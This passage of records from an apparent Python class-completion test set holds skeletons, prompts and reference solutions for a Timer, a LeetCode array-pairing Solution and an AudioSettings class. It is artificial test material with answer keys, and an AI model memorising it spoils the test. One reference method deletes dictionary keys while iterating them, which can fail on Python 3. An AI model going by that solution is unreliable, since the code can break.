"229456e0d4a9b73c0fd1069b062ca02c49dece00", "skeleton": "<|skeleton|>\nclass Timer:\n \"\"\"Example of usage: with Timer(\"TimedFunction\", newline=True, color='blue'): ... # do something\"\"\"\n\n def __init__(self, txt: str, newline: bool=False, color: str=None):\n \"\"\"Parameters ---------- txt: str Name of this timer. newline: bool Wheter you want prints to end with newlines. 
color: str One of 'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', or 'white'.\"\"\"\n <|body_0|>\n\n def __enter__(self):\n \"\"\"Used at the beginning of the section inside \"With Timer()\". Prints txt and starts time.\"\"\"\n <|body_1|>\n\n def __exit__(self, type, value, tb):\n \"\"\"Used at the end of the section inside \"With Timer()\". Prints 'done' and the final time.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Timer:\n \"\"\"Example of usage: with Timer(\"TimedFunction\", newline=True, color='blue'): ... # do something\"\"\"\n\n def __init__(self, txt: str, newline: bool=False, color: str=None):\n \"\"\"Parameters ---------- txt: str Name of this timer. newline: bool Wheter you want prints to end with newlines. color: str One of 'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', or 'white'.\"\"\"\n try:\n prepend = COLOR_CODES[color] if color else ''\n append = COLOR_CODES['reset'] if color else ''\n except KeyError:\n prepend = ''\n append = ''\n self.txt = prepend + txt + append\n self.newline = newline\n\n def __enter__(self):\n \"\"\"Used at the beginning of the section inside \"With Timer()\". Prints txt and starts time.\"\"\"\n self.start = time()\n if not self.newline:\n print(self.txt + '... ', end='')\n sys.stdout.flush()\n else:\n print(self.txt + '... ')\n\n def __exit__(self, type, value, tb):\n \"\"\"Used at the end of the section inside \"With Timer()\". Prints 'done' and the final time.\"\"\"\n if self.newline:\n print(self.txt + ' done in ', end='')\n print('{:.2f} sec.'.format(time() - self.start))\n", "source": "the_stack_v2_python_sparse", "source_path": "dwi_ml/experiment_utils/timer.py", "source_repo": "scil-vital/dwi_ml", "split": "test", "star_events_count": 8} {"blob_id": "9417caf6ac83a47534fe489d4a6e970474db0986", "bodies": ["import collections\nA = sorted(A, key=lambda a: abs(a))\ncount_A = collections.Counter(A)\nfor a in A:\n if count_A[a] >= 1:\n count_A[a] -= 1\n flag = count_A.get(a * 2, 0)\n if flag >= 1:\n count_A[a * 2] -= 1\n else:\n return False\nreturn True", "from collections import defaultdict\ncts = defaultdict(int)\nfor v in A:\n cts[v] += 1\nkeys = cts.keys()\nfor k in keys:\n if k % 2 == 1:\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n if cts[2 * k] == 0:\n del cts[2 * k]\nnegs = sorted([-k for k in keys if cts[k] > 0 and k < 0])\npos = sorted([k for k in keys if cts[k] > 0 and k > 0])\nzeros = cts[0]\nif zeros % 2 == 1:\n return False\nkeys = [-k for k in negs] + pos\nfor k in keys:\n if cts[k] == 0:\n continue\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\nreturn True"], "bodies_text": "<|body_start_0|>\n import collections\n A = sorted(A, key=lambda a: abs(a))\n count_A = collections.Counter(A)\n for a in A:\n if count_A[a] >= 1:\n count_A[a] -= 1\n flag = count_A.get(a * 2, 0)\n if flag >= 1:\n count_A[a * 2] -= 1\n else:\n return False\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n from collections import defaultdict\n cts = defaultdict(int)\n for v in A:\n cts[v] += 1\n keys = cts.keys()\n for k in keys:\n if k % 2 == 1:\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n if cts[2 * k] == 0:\n del cts[2 * k]\n negs = sorted([-k for k in keys if cts[k] > 0 and k < 0])\n pos = sorted([k for k in keys if cts[k] > 0 and k > 0])\n zeros = cts[0]\n if zeros % 2 == 1:\n return False\n keys = [-k for k 
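The Timer record above references a COLOR_CODES table and the time/sys modules without showing them. The sketch below fills those gaps with assumed values (two ANSI entries) so the context manager can actually be exercised; the class logic is otherwise the record's, lightly condensed.

import sys
from time import time, sleep

# Assumed: COLOR_CODES maps color names to ANSI escape sequences.
COLOR_CODES = {'blue': '\x1b[94m', 'reset': '\x1b[0m'}

class Timer:
    def __init__(self, txt, newline=False, color=None):
        try:
            prepend = COLOR_CODES[color] if color else ''
            append = COLOR_CODES['reset'] if color else ''
        except KeyError:
            prepend = append = ''
        self.txt = prepend + txt + append
        self.newline = newline

    def __enter__(self):
        self.start = time()
        print(self.txt + '... ', end='' if not self.newline else '\n')
        sys.stdout.flush()

    def __exit__(self, type, value, tb):
        if self.newline:
            print(self.txt + ' done in ', end='')
        print('{:.2f} sec.'.format(time() - self.start))

with Timer('short nap', color='blue'):
    sleep(0.1)
# prints: short nap... 0.10 sec.  (label rendered in blue)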
in negs] + pos\n for k in keys:\n if cts[k] == 0:\n continue\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n return True\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def canReorderDoubled(self, A):\n \"\"\":type A: List[int] :rtype: bool 400 ms\"\"\"\n <|body_0|>\n\n def canReorderDoubled_1(self, A):\n \"\"\":type A: List[int] :rtype: bool 120ms\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n import collections\n A = sorted(A, key=lambda a: abs(a))\n count_A = collections.Counter(A)\n for a in A:\n if count_A[a] >= 1:\n count_A[a] -= 1\n flag = count_A.get(a * 2, 0)\n if flag >= 1:\n count_A[a * 2] -= 1\n else:\n return False\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n from collections import defaultdict\n cts = defaultdict(int)\n for v in A:\n cts[v] += 1\n keys = cts.keys()\n for k in keys:\n if k % 2 == 1:\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n if cts[2 * k] == 0:\n del cts[2 * k]\n negs = sorted([-k for k in keys if cts[k] > 0 and k < 0])\n pos = sorted([k for k in keys if cts[k] > 0 and k > 0])\n zeros = cts[0]\n if zeros % 2 == 1:\n return False\n keys = [-k for k in negs] + pos\n for k in keys:\n if cts[k] == 0:\n continue\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n return True\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000020", "length_bytes": 2474, "license_type": "no_license", "methods": [{"docstring": ":type A: List[int] :rtype: bool 400 ms", "name": "canReorderDoubled", "signature": "def canReorderDoubled(self, A)"}, {"docstring": ":type A: List[int] :rtype: bool 120ms", "name": "canReorderDoubled_1", "signature": "def canReorderDoubled_1(self, A)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000674", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def canReorderDoubled(self, A): :type A: List[int] :rtype: bool 400 ms\n- def canReorderDoubled_1(self, A): :type A: List[int] :rtype: bool 120ms", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def canReorderDoubled(self, A): :type A: List[int] :rtype: bool 400 ms\n- def canReorderDoubled_1(self, A): :type A: List[int] :rtype: bool 120ms\n\n<|skeleton|>\nclass Solution:\n\n def canReorderDoubled(self, A):\n \"\"\":type A: List[int] :rtype: bool 400 ms\"\"\"\n <|body_0|>\n\n def canReorderDoubled_1(self, A):\n \"\"\":type A: List[int] :rtype: bool 120ms\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n import collections\n A = sorted(A, key=lambda a: abs(a))\n count_A = collections.Counter(A)\n for a in A:\n if count_A[a] >= 1:\n count_A[a] -= 1\n flag = count_A.get(a * 2, 0)\n if flag >= 1:\n count_A[a * 2] -= 1\n else:\n return False\n return True\n<|end_body_0|>\n\n<|body_start_1|>\n from collections import defaultdict\n cts = defaultdict(int)\n for v in A:\n cts[v] += 1\n keys = cts.keys()\n for k in keys:\n if k % 2 == 1:\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n if cts[2 * k] == 0:\n del cts[2 * k]\n negs = sorted([-k for k in keys if cts[k] > 0 and k < 0])\n pos = sorted([k for k in keys if cts[k] > 0 and k > 0])\n zeros = cts[0]\n if 
zeros % 2 == 1:\n return False\n keys = [-k for k in negs] + pos\n for k in keys:\n if cts[k] == 0:\n continue\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n return True\n<|end_body_1|>\n", "revision_id": "679a2b246b8b6bb7fc55ed1c8096d3047d6d4461", "skeleton": "<|skeleton|>\nclass Solution:\n\n def canReorderDoubled(self, A):\n \"\"\":type A: List[int] :rtype: bool 400 ms\"\"\"\n <|body_0|>\n\n def canReorderDoubled_1(self, A):\n \"\"\":type A: List[int] :rtype: bool 120ms\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def canReorderDoubled(self, A):\n \"\"\":type A: List[int] :rtype: bool 400 ms\"\"\"\n import collections\n A = sorted(A, key=lambda a: abs(a))\n count_A = collections.Counter(A)\n for a in A:\n if count_A[a] >= 1:\n count_A[a] -= 1\n flag = count_A.get(a * 2, 0)\n if flag >= 1:\n count_A[a * 2] -= 1\n else:\n return False\n return True\n\n def canReorderDoubled_1(self, A):\n \"\"\":type A: List[int] :rtype: bool 120ms\"\"\"\n from collections import defaultdict\n cts = defaultdict(int)\n for v in A:\n cts[v] += 1\n keys = cts.keys()\n for k in keys:\n if k % 2 == 1:\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n if cts[2 * k] == 0:\n del cts[2 * k]\n negs = sorted([-k for k in keys if cts[k] > 0 and k < 0])\n pos = sorted([k for k in keys if cts[k] > 0 and k > 0])\n zeros = cts[0]\n if zeros % 2 == 1:\n return False\n keys = [-k for k in negs] + pos\n for k in keys:\n if cts[k] == 0:\n continue\n if cts[2 * k] < cts[k]:\n return False\n cts[2 * k] -= cts[k]\n del cts[k]\n return True\n", "source": "the_stack_v2_python_sparse", "source_path": "ArrayOfDoubledPairs_MID_954.py", "source_repo": "953250587/leetcode-python", "split": "test", "star_events_count": 2} {"blob_id": "90d7f72b61728fcea07b2a84f7dd75f7e4bfa464", "bodies": ["if channels is ...:\n channels = CHANNELS_DEFAULT\nelse:\n channels = validate_channels(channels)\nif frame_length is ...:\n frame_length = FRAME_LENGTH_DEFAULT\nelse:\n frame_length = validate_frame_length(frame_length)\nif sampling_rate is ...:\n sampling_rate = SAMPLING_RATE_DEFAULT\nelse:\n sampling_rate = validate_sampling_rate(sampling_rate)\nsample_size = 2 * channels\nsamples_per_frame = int(sampling_rate / 1000 * frame_length)\nframe_size = samples_per_frame * sample_size\nbuffer_type = CCharType * frame_size\nself = object.__new__(cls)\nself.buffer_type = buffer_type\nself.channels = channels\nself.frame_length = frame_length\nself.frame_size = frame_size\nself.samples_per_frame = samples_per_frame\nself.sampling_rate = sampling_rate\nself.sample_size = sample_size\nreturn self", "if type(self) is not type(other):\n return NotImplemented\nif self.channels != other.channels:\n return False\nif self.frame_length != other.frame_length:\n return False\nif self.sampling_rate != other.sampling_rate:\n return False\nreturn True", "repr_parts = ['<', self.__class__.__name__]\nrepr_parts.append(' channels = ')\nrepr_parts.append(repr(self.channels))\nrepr_parts.append(', frame_length = ')\nrepr_parts.append(repr(self.frame_length))\nrepr_parts.append(', sampling_rate = ')\nrepr_parts.append(repr(self.sampling_rate))\nrepr_parts.append('>')\nreturn ''.join(repr_parts)", "new = object.__new__(type(self))\nnew.buffer_type = self.buffer_type\nnew.channels = self.channels\nnew.frame_length = self.frame_length\nnew.frame_size = self.frame_size\nnew.samples_per_frame 
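# --- Editor's sketch: a corrected take on canReorderDoubled_1 from the Solution record above. ---
# The "120ms" variant deletes keys from `cts` and triggers defaultdict
# auto-insertion while iterating the live keys() view, which can raise
# RuntimeError ("dictionary changed size during iteration") on Python 3
# (it only worked on Python 2, where keys() returned a list). This
# self-contained rewrite keeps the same counting idea, but snapshots the
# keys and orders them by absolute value so negative values pair correctly.
# A sketch, not the record's verbatim solution.
from collections import Counter

def can_reorder_doubled(a):
    counts = Counter(a)
    if counts[0] % 2:                      # zeros can only pair with zeros
        return False
    for x in sorted(counts, key=abs):      # smallest magnitude first
        if x == 0 or counts[x] == 0:
            continue
        if counts[2 * x] < counts[x]:      # not enough partners for every x
            return False
        counts[2 * x] -= counts[x]
        counts[x] = 0
    return True

assert can_reorder_doubled([4, -2, 2, -4]) is True
assert can_reorder_doubled([3, 1, 3, 6]) is False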
= self.samples_per_frame\nnew.sampling_rate = self.sampling_rate\nnew.sample_size = self.sample_size\nreturn new", "if channels is ...:\n channels = self.channels\nelse:\n channels = validate_channels(channels)\nif frame_length is ...:\n frame_length = self.frame_length\nelse:\n frame_length = validate_frame_length(frame_length)\nif sampling_rate is ...:\n sampling_rate = self.sampling_rate\nelse:\n sampling_rate = validate_sampling_rate(sampling_rate)\nsample_size = 2 * channels\nsamples_per_frame = int(sampling_rate / 1000 * frame_length)\nframe_size = samples_per_frame * sample_size\nbuffer_type = CCharType * frame_size\nnew = object.__new__(type(self))\nnew.buffer_type = buffer_type\nnew.channels = channels\nnew.frame_length = frame_length\nnew.frame_size = frame_size\nnew.samples_per_frame = samples_per_frame\nnew.sampling_rate = sampling_rate\nnew.sample_size = sample_size\nreturn new"], "bodies_text": "<|body_start_0|>\n if channels is ...:\n channels = CHANNELS_DEFAULT\n else:\n channels = validate_channels(channels)\n if frame_length is ...:\n frame_length = FRAME_LENGTH_DEFAULT\n else:\n frame_length = validate_frame_length(frame_length)\n if sampling_rate is ...:\n sampling_rate = SAMPLING_RATE_DEFAULT\n else:\n sampling_rate = validate_sampling_rate(sampling_rate)\n sample_size = 2 * channels\n samples_per_frame = int(sampling_rate / 1000 * frame_length)\n frame_size = samples_per_frame * sample_size\n buffer_type = CCharType * frame_size\n self = object.__new__(cls)\n self.buffer_type = buffer_type\n self.channels = channels\n self.frame_length = frame_length\n self.frame_size = frame_size\n self.samples_per_frame = samples_per_frame\n self.sampling_rate = sampling_rate\n self.sample_size = sample_size\n return self\n<|end_body_0|>\n\n<|body_start_1|>\n if type(self) is not type(other):\n return NotImplemented\n if self.channels != other.channels:\n return False\n if self.frame_length != other.frame_length:\n return False\n if self.sampling_rate != other.sampling_rate:\n return False\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n repr_parts = ['<', self.__class__.__name__]\n repr_parts.append(' channels = ')\n repr_parts.append(repr(self.channels))\n repr_parts.append(', frame_length = ')\n repr_parts.append(repr(self.frame_length))\n repr_parts.append(', sampling_rate = ')\n repr_parts.append(repr(self.sampling_rate))\n repr_parts.append('>')\n return ''.join(repr_parts)\n<|end_body_2|>\n\n<|body_start_3|>\n new = object.__new__(type(self))\n new.buffer_type = self.buffer_type\n new.channels = self.channels\n new.frame_length = self.frame_length\n new.frame_size = self.frame_size\n new.samples_per_frame = self.samples_per_frame\n new.sampling_rate = self.sampling_rate\n new.sample_size = self.sample_size\n return new\n<|end_body_3|>\n\n<|body_start_4|>\n if channels is ...:\n channels = self.channels\n else:\n channels = validate_channels(channels)\n if frame_length is ...:\n frame_length = self.frame_length\n else:\n frame_length = validate_frame_length(frame_length)\n if sampling_rate is ...:\n sampling_rate = self.sampling_rate\n else:\n sampling_rate = validate_sampling_rate(sampling_rate)\n sample_size = 2 * channels\n samples_per_frame = int(sampling_rate / 1000 * frame_length)\n frame_size = samples_per_frame * sample_size\n buffer_type = CCharType * frame_size\n new = object.__new__(type(self))\n new.buffer_type = buffer_type\n new.channels = channels\n new.frame_length = frame_length\n new.frame_size = frame_size\n new.samples_per_frame = samples_per_frame\n 
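# --- Editor's worked example of the AudioSettings frame-geometry arithmetic above. ---
# The concrete values (stereo, 20 ms frames, 48 kHz) are illustrative
# assumptions, not defaults taken from the record; per the class docstring,
# each sample is an i16, i.e. 2 bytes per channel.
channels = 2
frame_length = 20                 # milliseconds
sampling_rate = 48000             # samples per second

sample_size = 2 * channels                                    # 4 bytes
samples_per_frame = int(sampling_rate / 1000 * frame_length)  # 960
frame_size = samples_per_frame * sample_size                  # 3840 bytes

assert (sample_size, samples_per_frame, frame_size) == (4, 960, 3840)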
new.sampling_rate = sampling_rate\n new.sample_size = sample_size\n return new\n<|end_body_4|>\n", "class_docstring": "Attributes ---------- buffer_type : `type` C char array type for creating buffer. channels : `int` The number of channels. (1 if mono, 2 if stereo.) frame_length : `int` The length of a frame in milliseconds. frame_size : `int` The size of a frame in bytes. sampling_rate : `int` The number of samples per second that are taken of a waveform to create a digital signal. The higher the sample rate, the more snapshots are captured in the audio signal. sample_size : `int` The number of bits used to describe each sample. A sample is a value represented in `i16`. Each channel has their own samples. samples_per_frame : `int` The amount of samples that are in each frame.", "class_name": "AudioSettings", "detected_licenses": ["LicenseRef-scancode-warranty-disclaimer"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass AudioSettings:\n \"\"\"Attributes ---------- buffer_type : `type` C char array type for creating buffer. channels : `int` The number of channels. (1 if mono, 2 if stereo.) frame_length : `int` The length of a frame in milliseconds. frame_size : `int` The size of a frame in bytes. sampling_rate : `int` The number of samples per second that are taken of a waveform to create a digital signal. The higher the sample rate, the more snapshots are captured in the audio signal. sample_size : `int` The number of bits used to describe each sample. A sample is a value represented in `i16`. Each channel has their own samples. samples_per_frame : `int` The amount of samples that are in each frame.\"\"\"\n\n def __new__(cls, *, channels=..., frame_length=..., sampling_rate=...):\n \"\"\"Creates a new audio setting. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\"\"\"\n <|body_0|>\n\n def __eq__(self, other):\n \"\"\"Returns whether the two audio settings are equal.\"\"\"\n <|body_1|>\n\n def __repr__(self):\n \"\"\"Returns the audio settings representation.\"\"\"\n <|body_2|>\n\n def copy(self):\n \"\"\"Copies the audio settings. Returns ------- new : `instance>`\"\"\"\n <|body_3|>\n\n def copy_with(self, *, channels=..., frame_length=..., sampling_rate=...):\n \"\"\"Copies the audio settings with the given fields. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Returns ------- new : `instance>` Raises ------ TypeError - If a parameter's type is incorrect. 
ValueError - If a parameter's value is incorrect.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if channels is ...:\n channels = CHANNELS_DEFAULT\n else:\n channels = validate_channels(channels)\n if frame_length is ...:\n frame_length = FRAME_LENGTH_DEFAULT\n else:\n frame_length = validate_frame_length(frame_length)\n if sampling_rate is ...:\n sampling_rate = SAMPLING_RATE_DEFAULT\n else:\n sampling_rate = validate_sampling_rate(sampling_rate)\n sample_size = 2 * channels\n samples_per_frame = int(sampling_rate / 1000 * frame_length)\n frame_size = samples_per_frame * sample_size\n buffer_type = CCharType * frame_size\n self = object.__new__(cls)\n self.buffer_type = buffer_type\n self.channels = channels\n self.frame_length = frame_length\n self.frame_size = frame_size\n self.samples_per_frame = samples_per_frame\n self.sampling_rate = sampling_rate\n self.sample_size = sample_size\n return self\n<|end_body_0|>\n\n<|body_start_1|>\n if type(self) is not type(other):\n return NotImplemented\n if self.channels != other.channels:\n return False\n if self.frame_length != other.frame_length:\n return False\n if self.sampling_rate != other.sampling_rate:\n return False\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n repr_parts = ['<', self.__class__.__name__]\n repr_parts.append(' channels = ')\n repr_parts.append(repr(self.channels))\n repr_parts.append(', frame_length = ')\n repr_parts.append(repr(self.frame_length))\n repr_parts.append(', sampling_rate = ')\n repr_parts.append(repr(self.sampling_rate))\n repr_parts.append('>')\n return ''.join(repr_parts)\n<|end_body_2|>\n\n<|body_start_3|>\n new = object.__new__(type(self))\n new.buffer_type = self.buffer_type\n new.channels = self.channels\n new.frame_length = self.frame_length\n new.frame_size = self.frame_size\n new.samples_per_frame = self.samples_per_frame\n new.sampling_rate = self.sampling_rate\n new.sample_size = self.sample_size\n return new\n<|end_body_3|>\n\n<|body_start_4|>\n if channels is ...:\n channels = self.channels\n else:\n channels = validate_channels(channels)\n if frame_length is ...:\n frame_length = self.frame_length\n else:\n frame_length = validate_frame_length(frame_length)\n if sampling_rate is ...:\n sampling_rate = self.sampling_rate\n else:\n sampling_rate = validate_sampling_rate(sampling_rate)\n sample_size = 2 * channels\n samples_per_frame = int(sampling_rate / 1000 * frame_length)\n frame_size = samples_per_frame * sample_size\n buffer_type = CCharType * frame_size\n new = object.__new__(type(self))\n new.buffer_type = buffer_type\n new.channels = channels\n new.frame_length = frame_length\n new.frame_size = frame_size\n new.samples_per_frame = samples_per_frame\n new.sampling_rate = sampling_rate\n new.sample_size = sample_size\n return new\n<|end_body_4|>\n", "id": "stack_v2_sparse_classes_10k_test_000021", "length_bytes": 6797, "license_type": "permissive", "methods": [{"docstring": "Creates a new audio setting. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Raises ------ TypeError - If a parameter's type is incorrect. 
ValueError - If a parameter's value is incorrect.", "name": "__new__", "signature": "def __new__(cls, *, channels=..., frame_length=..., sampling_rate=...)"}, {"docstring": "Returns whether the two audio settings are equal.", "name": "__eq__", "signature": "def __eq__(self, other)"}, {"docstring": "Returns the audio settings representation.", "name": "__repr__", "signature": "def __repr__(self)"}, {"docstring": "Copies the audio settings. Returns ------- new : `instance>`", "name": "copy", "signature": "def copy(self)"}, {"docstring": "Copies the audio settings with the given fields. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Returns ------- new : `instance>` Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.", "name": "copy_with", "signature": "def copy_with(self, *, channels=..., frame_length=..., sampling_rate=...)"}], "n_methods": 5, "prompt": "Implement the Python class `AudioSettings` described below.\n\nClass description:\nAttributes ---------- buffer_type : `type` C char array type for creating buffer. channels : `int` The number of channels. (1 if mono, 2 if stereo.) frame_length : `int` The length of a frame in milliseconds. frame_size : `int` The size of a frame in bytes. sampling_rate : `int` The number of samples per second that are taken of a waveform to create a digital signal. The higher the sample rate, the more snapshots are captured in the audio signal. sample_size : `int` The number of bits used to describe each sample. A sample is a value represented in `i16`. Each channel has their own samples. samples_per_frame : `int` The amount of samples that are in each frame.\n\nMethod signatures and docstrings:\n- def __new__(cls, *, channels=..., frame_length=..., sampling_rate=...): Creates a new audio setting. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\n- def __eq__(self, other): Returns whether the two audio settings are equal.\n- def __repr__(self): Returns the audio settings representation.\n- def copy(self): Copies the audio settings. Returns ------- new : `instance>`\n- def copy_with(self, *, channels=..., frame_length=..., sampling_rate=...): Copies the audio settings with the given fields. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Returns ------- new : `instance>` Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.", "prompted_full_text": "Implement the Python class `AudioSettings` described below.\n\nClass description:\nAttributes ---------- buffer_type : `type` C char array type for creating buffer. channels : `int` The number of channels. 
(1 if mono, 2 if stereo.) frame_length : `int` The length of a frame in milliseconds. frame_size : `int` The size of a frame in bytes. sampling_rate : `int` The number of samples per second that are taken of a waveform to create a digital signal. The higher the sample rate, the more snapshots are captured in the audio signal. sample_size : `int` The number of bits used to describe each sample. A sample is a value represented in `i16`. Each channel has their own samples. samples_per_frame : `int` The amount of samples that are in each frame.\n\nMethod signatures and docstrings:\n- def __new__(cls, *, channels=..., frame_length=..., sampling_rate=...): Creates a new audio setting. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\n- def __eq__(self, other): Returns whether the two audio settings are equal.\n- def __repr__(self): Returns the audio settings representation.\n- def copy(self): Copies the audio settings. Returns ------- new : `instance>`\n- def copy_with(self, *, channels=..., frame_length=..., sampling_rate=...): Copies the audio settings with the given fields. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Returns ------- new : `instance>` Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\n\n<|skeleton|>\nclass AudioSettings:\n \"\"\"Attributes ---------- buffer_type : `type` C char array type for creating buffer. channels : `int` The number of channels. (1 if mono, 2 if stereo.) frame_length : `int` The length of a frame in milliseconds. frame_size : `int` The size of a frame in bytes. sampling_rate : `int` The number of samples per second that are taken of a waveform to create a digital signal. The higher the sample rate, the more snapshots are captured in the audio signal. sample_size : `int` The number of bits used to describe each sample. A sample is a value represented in `i16`. Each channel has their own samples. samples_per_frame : `int` The amount of samples that are in each frame.\"\"\"\n\n def __new__(cls, *, channels=..., frame_length=..., sampling_rate=...):\n \"\"\"Creates a new audio setting. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\"\"\"\n <|body_0|>\n\n def __eq__(self, other):\n \"\"\"Returns whether the two audio settings are equal.\"\"\"\n <|body_1|>\n\n def __repr__(self):\n \"\"\"Returns the audio settings representation.\"\"\"\n <|body_2|>\n\n def copy(self):\n \"\"\"Copies the audio settings. 
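For concreteness, a hypothetical usage sketch of the __eq__ / copy / copy_with trio defined in this record; it assumes the module-level validators (validate_channels and friends, which are not shown in the record) accept these values.

settings = AudioSettings(channels=2, frame_length=20, sampling_rate=48000)
clone = settings.copy()
tweaked = settings.copy_with(sampling_rate=16000)

assert clone == settings                   # all three compared fields match
assert tweaked != settings                 # sampling_rate differs
assert tweaked.samples_per_frame == 320    # 16000 / 1000 * 20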
Returns ------- new : `instance>`\"\"\"\n <|body_3|>\n\n def copy_with(self, *, channels=..., frame_length=..., sampling_rate=...):\n \"\"\"Copies the audio settings with the given fields. Parameters ---------- channels : `int`, Optional (Keyword only) The number of channels. frame_length : `int`, Optional (Keyword only) The length of a frame in milliseconds. sampling_rate : `int`, Optional (Keyword only) The number of samples per second that are taken of a waveform to create a digital signal. Returns ------- new : `instance>` Raises ------ TypeError - If a parameter's type is incorrect. ValueError - If a parameter's value is incorrect.\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if channels is ...:\n channels = CHANNELS_DEFAULT\n else:\n channels = validate_channels(channels)\n if frame_length is ...:\n frame_length = FRAME_LENGTH_DEFAULT\n else:\n frame_length = validate_frame_length(frame_length)\n if sampling_rate is ...:\n sampling_rate = SAMPLING_RATE_DEFAULT\n else:\n sampling_rate = validate_sampling_rate(sampling_rate)\n sample_size = 2 * channels\n samples_per_frame = int(sampling_rate / 1000 * frame_length)\n frame_size = samples_per_frame * sample_size\n buffer_type = CCharType * frame_size\n self = object.__new__(cls)\n self.buffer_type = buffer_type\n self.channels = channels\n self.frame_length = frame_length\n self.frame_size = frame_size\n self.samples_per_frame = samples_per_frame\n self.sampling_rate = sampling_rate\n self.sample_size = sample_size\n return self\n<|end_body_0|>\n\n<|body_start_1|>\n if type(self) is not type(other):\n return NotImplemented\n if self.channels != other.channels:\n return False\n if self.frame_length != other.frame_length:\n return False\n if self.sampling_rate != other.sampling_rate:\n return False\n return True\n<|end_body_1|>\n\n<|body_start_2|>\n repr_parts = ['<', self.__class__.__name__]\n repr_parts.append(' channels = ')\n repr_parts.append(repr(self.channels))\n repr_parts.append(', frame_length = ')\n repr_parts.append(repr(self.frame_length))\n repr_parts.append(', sampling_rate = ')\n repr_parts.append(repr(self.sampling_rate))\n repr_parts.append('>')\n return ''.join(repr_parts)\n<|end_body_2|>\n\n<|body_start_3|>\n new = object.__new__(type(self))\n new.buffer_type = self.buffer_type\n new.channels = self.channels\n new.frame_length = self.frame_length\n new.frame_size = self.frame_size\n new.samples_per_frame = self.samples_per_frame\n new.sampling_rate = self.sampling_rate\n new.sample_size = self.sample_size\n return new\n<|end_body_3|>\n\n<|body_start_4|>\n if channels is ...:\n channels = self.channels\n else:\n channels = validate_channels(channels)\n if frame_length is 